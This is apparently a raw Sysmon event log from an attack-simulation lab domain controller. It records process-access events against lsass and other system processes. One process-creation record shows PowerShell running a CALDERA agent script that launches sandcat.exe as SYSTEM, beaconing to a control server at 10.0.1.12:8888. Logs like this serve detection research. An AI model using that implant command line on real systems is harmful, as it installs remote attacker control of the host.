10341000x80000000000000001597Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:00.954{266CAFBE-646A-6064-0B00-00000000AE01}8562292C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
534500x80000000000000001596Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:00.936{266CAFBE-6476-6064-2800-00000000AE01}2556C:\Users\Public\sandcat.exe 10341000x80000000000000001595Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:00.299{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}2380C:\Windows\system32\wermgr.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001594Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:00.299{266CAFBE-646C-6064-1000-00000000AE01}11242828C:\Windows\system32\svchost.exe{00000000-0000-0000-0000-000000000000}2380C:\Windows\system32\wermgr.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\wer.dll+6e508|C:\Windows\System32\wer.dll+3776c|C:\Windows\System32\wer.dll+38a78|C:\Windows\System32\wer.dll+13ae4|C:\Windows\System32\wer.dll+51b6|c:\windows\system32\wuaueng.dll+d4e24|c:\windows\system32\wuaueng.dll+551f4|c:\windows\system32\wuaueng.dll+4e23b|c:\windows\system32\wuaueng.dll+4e48b|c:\windows\system32\wuaueng.dll+4e5ee|c:\windows\system32\wuaueng.dll+4fba0|c:\windows\system32\wuaueng.dll+5c1ef|c:\windows\system32\wuaueng.dll+4d1c5|c:\windows\system32\wuaueng.dll+4c7f5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001593Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:56.643{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001592Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:56.643{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001591Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:54.690{266CAFBE-646E-6064-1C00-00000000AE01}23042400C:\Windows\system32\conhost.exe{266CAFBE-6476-6064-2800-00000000AE01}2556C:\Users\Public\sandcat.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001590Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:54.674{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-6476-6064-2800-00000000AE01}2556C:\Users\Public\sandcat.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001589Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:54.674{266CAFBE-646E-6064-1900-00000000AE01}22762904C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{266CAFBE-6476-6064-2800-00000000AE01}2556C:\Users\Public\sandcat.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+384236|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+6cd0fff4(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+6c19347d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Man
agement.Automation.ni.dll+6c1930b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+6cc5b3b6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+6c15002a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+6c1b3a9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+6c195aab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+6c195aab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+6c19593c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+6c18665c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+6c193b9e(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+6c193710(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+6c19347d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+6c1930b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+6cc5b3b6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Aut
omation.ni.dll+6c178363(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+6c1778d5(wow64) 154100x80000000000000001588Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:54.634{266CAFBE-6476-6064-2800-00000000AE01}2556C:\Users\Public\sandcat.exe-----"C:\Users\Public\sandcat.exe" -server http://10.0.1.12:8888 -group my_group -vC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=4AAC4143487A1888FC416C8D6AAA28BF,SHA256=A98ED4833C64FF96AD74F1A76358B1FB947C7BC61502E51624AFE6944982EC93,IMPHASH=1CD364A9E949D5ECEBD6C614E64BC545{266CAFBE-646E-6064-1900-00000000AE01}2276C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Unrestricted -NonInteractive -File C:\caldera_agent.ps1 10341000x80000000000000001587Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:54.471{266CAFBE-646A-6064-0B00-00000000AE01}856976C:\Windows\system32\lsass.exe{266CAFBE-6476-6064-2700-00000000AE01}2448C:\Windows\System32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x80000000000000001586Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:54.471{266CAFBE-646A-6064-0B00-00000000AE01}856976C:\Windows\system32\lsass.exe{266CAFBE-6476-6064-2700-00000000AE01}2448C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001585Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:54.471{266CAFBE-646A-6064-0B00-00000000AE01}856976C:\Windows\system32\lsass.exe{266CAFBE-6476-6064-2700-00000000AE01}2448C:\Windows\System32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x80000000000000001584Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:54.471{266CAFBE-646A-6064-0B00-00000000AE01}856976C:\Windows\system32\lsass.exe{266CAFBE-6476-6064-2700-00000000AE01}2448C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 13241300x80000000000000001583Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:54.471{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\Netlogon\Private\IPV6SocketAddressListBinary Data 10341000x80000000000000001582Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:54.471{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-6476-6064-2700-00000000AE01}2448C:\Windows\System32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001581Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:54.471{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-6476-6064-2700-00000000AE01}2448C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001580Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:54.471{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-6476-6064-2700-00000000AE01}2448C:\Windows\System32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001579Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:54.471{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-6476-6064-2700-00000000AE01}2448C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001578Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:54.471{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-6476-6064-2700-00000000AE01}2448C:\Windows\System32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001577Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:54.471{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-6476-6064-2700-00000000AE01}2448C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001576Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:54.471{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-6476-6064-2700-00000000AE01}2448C:\Windows\System32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001575Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:54.471{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-6476-6064-2700-00000000AE01}2448C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001574Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:54.471{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-6476-6064-2700-00000000AE01}2448C:\Windows\System32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001573Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:54.471{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-6476-6064-2700-00000000AE01}2448C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001572Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
